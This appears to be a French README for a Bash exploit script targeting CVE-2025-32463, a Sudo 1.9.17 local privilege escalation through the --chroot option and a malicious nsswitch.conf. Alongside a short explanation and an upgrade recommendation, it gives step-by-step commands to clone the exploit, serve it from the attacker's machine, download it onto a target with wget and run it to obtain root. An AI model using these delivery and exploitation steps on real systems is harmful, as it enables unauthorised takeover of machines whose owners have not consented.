
Script d'exploitation Bash pour CVE-2025-32463, une vulnérabilité d'élévation de privilèges locale dans Sudo 1.9.17 via l'option chroot, permettant d'obtenir un accès root sur les systèmes affectés.
Sudo version 1.9.17 a une vulnérabilité critique (CVE-2025-32463) qui permet à des utilisateurs locaux d'obtenir un accès root en exploitant l'option chroot, ce qui peut entraîner de graves risques de sécurité. Il est conseillé aux utilisateurs de mettre à jour vers la version 1.9.17p1 ou ultérieure pour atténuer ce problème.
Aperçu de la vulnérabilité de Sudo 1.9.17 :-
La vulnérabilité de Sudo version 1.9.17, identifiée comme CVE-2025-32463, est un défaut critique qui permet à des utilisateurs locaux d'obtenir un accès root. Ce problème provient d'un changement dans la façon dont Sudo gère l'option --chroot (-R), qui est conçue pour isoler les processus en changeant leur répertoire racine.
Comment fonctionne la vulnérabilité :-
Problème de résolution de chemin : Dans les versions 1.9.14 à 1.9.17, Sudo évalue l'option --chroot avant de vérifier les permissions utilisateur. Cela permet aux attaquants de contrôler l'environnement et de charger des bibliothèques malveillantes.
Étapes d'exploitation :
Un attaquant crée un fichier nsswitch.conf malveillant dans un répertoire qu'il contrôle. Il exécute Sudo avec l'option -R, forçant Sudo à charger la configuration et les bibliothèques de l'attaquant, ce qui accorde un accès root.
J'ai créé un script bash "cwoot.sh" qui, après exécution, élève directement les privilèges à root.
Faites ce qui suit :
Téléchargez le script depuis le dépôt : git clone https://github.com/justjoeyking/CVE-2025-32463.git
Sur votre machine : python3 -m http.server 8080
Sur la machine cible : wget http://<own_IP_address>:8080/cwoot.sh
Sur la machine cible : chmod 755 cwoot.sh
Exécutez le script sur la machine cible : ./cwoot.sh